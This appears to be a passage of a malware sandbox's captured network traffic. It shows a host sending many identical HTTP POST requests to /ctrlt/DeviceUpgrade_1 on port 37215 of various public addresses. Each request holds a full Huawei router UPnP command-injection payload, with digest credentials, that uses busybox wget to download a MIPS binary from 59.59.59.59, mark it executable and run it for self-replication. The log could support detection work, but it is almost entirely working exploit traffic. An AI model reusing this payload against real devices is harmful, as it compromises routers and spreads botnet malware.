                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          32192.168.2.1542328205.96.59.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507225037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          33192.168.2.155964623.116.225.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507231951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          34192.168.2.1554282179.74.239.3637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507257938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          35192.168.2.154060052.73.180.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507272959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          36192.168.2.1545200197.25.48.13037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507323027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          37192.168.2.1539686157.41.82.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507323027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          38192.168.2.1549880157.36.20.24837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507339954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          39192.168.2.1548950197.21.90.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507395983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          40192.168.2.155282270.203.250.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507432938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          41192.168.2.155433241.199.164.12337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507441044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 